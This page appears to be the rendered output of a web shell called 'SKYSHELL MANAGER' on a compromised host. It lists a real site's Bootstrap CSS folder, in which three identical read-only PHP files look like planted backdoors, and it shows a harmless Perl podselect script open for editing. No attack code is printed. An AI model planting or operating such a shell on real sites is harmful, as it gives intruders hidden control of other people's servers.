📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuryempire.com
/
academy
/
assets
/
vendor
/
bootstrap
/
css
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
bootstrap-utilities.min.css.map
104.69 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css
67.22 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css.map
178.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css
49.94 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css.map
104.53 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css
191.25 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css.map
500.48 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css
151.98 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css.map
419.41 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css
190.55 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css.map
500.38 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.min.css.map
617.97 KB
0644
🗑️
⬇️
✏️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
core.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
760.06 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.min.css
50.01 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css
67.35 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css.map
178.58 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css
50.37 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css
69.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css
50.3 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css.map
113.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css
69.14 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css.map
113.15 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css.map
39.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css
5.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css.map
96.73 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css
4.56 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css.map
33.12 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css
5.72 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css.map
96.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css
4.63 KB
0644
🗑️
⬇️
✏️
🔒
📄
system.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
Editing: podselect
#!/usr/bin/perl eval 'exec perl -S $0 "$@"' if 0; ############################################################################# # podselect -- command to invoke the podselect function in Pod::Select # # Copyright (c) 1996-2000 by Bradford Appleton. All rights reserved. # This file is part of "PodParser". PodParser is free software; # you can redistribute it and/or modify it under the same terms # as Perl itself. ############################################################################# use strict; #use diagnostics; =head1 NAME podselect - print selected sections of pod documentation on standard output =head1 SYNOPSIS B<podselect> [B<-help>] [B<-man>] [B<-section>S< >I<section-spec>] [I<file>S< >...] =head1 OPTIONS AND ARGUMENTS =over 8 =item B<-help> Print a brief help message and exit. =item B<-man> Print the manual page and exit. =item B<-section>S< >I<section-spec> Specify a section to include in the output. See L<Pod::Parser/"SECTION SPECIFICATIONS"> for the format to use for I<section-spec>. This option may be given multiple times on the command line. =item I<file> The pathname of a file from which to select sections of pod documentation (defaults to standard input). =back =head1 DESCRIPTION B<podselect> will read the given input files looking for pod documentation and will print out (in raw pod format) all sections that match one ore more of the given section specifications. If no section specifications are given than all pod sections encountered are output. B<podselect> invokes the B<podselect()> function exported by B<Pod::Select> Please see L<Pod::Select/podselect()> for more details. =head1 SEE ALSO L<Pod::Parser> and L<Pod::Select> =head1 AUTHOR Please report bugs using L<http://rt.cpan.org>. Brad Appleton E<lt>bradapp@enteract.comE<gt> Based on code for B<Pod::Text::pod2text(1)> written by Tom Christiansen E<lt>tchrist@mox.perl.comE<gt> =cut use Pod::Select; use Pod::Usage; use Getopt::Long; ## Define options my %options = ( 'help' => 0, 'man' => 0, 'sections' => [], ); ## Parse options GetOptions(\%options, 'help', 'man', 'sections|select=s@') || pod2usage(2); pod2usage(1) if ($options{help}); pod2usage(-verbose => 2) if ($options{man}); ## Dont default to STDIN if connected to a terminal pod2usage(2) if ((@ARGV == 0) && (-t STDIN)); ## Invoke podselect(). if (@{ $options{'sections'} } > 0) { podselect({ -sections => $options{'sections'} }, @ARGV); } else { podselect(@ARGV); }
💾 Save Changes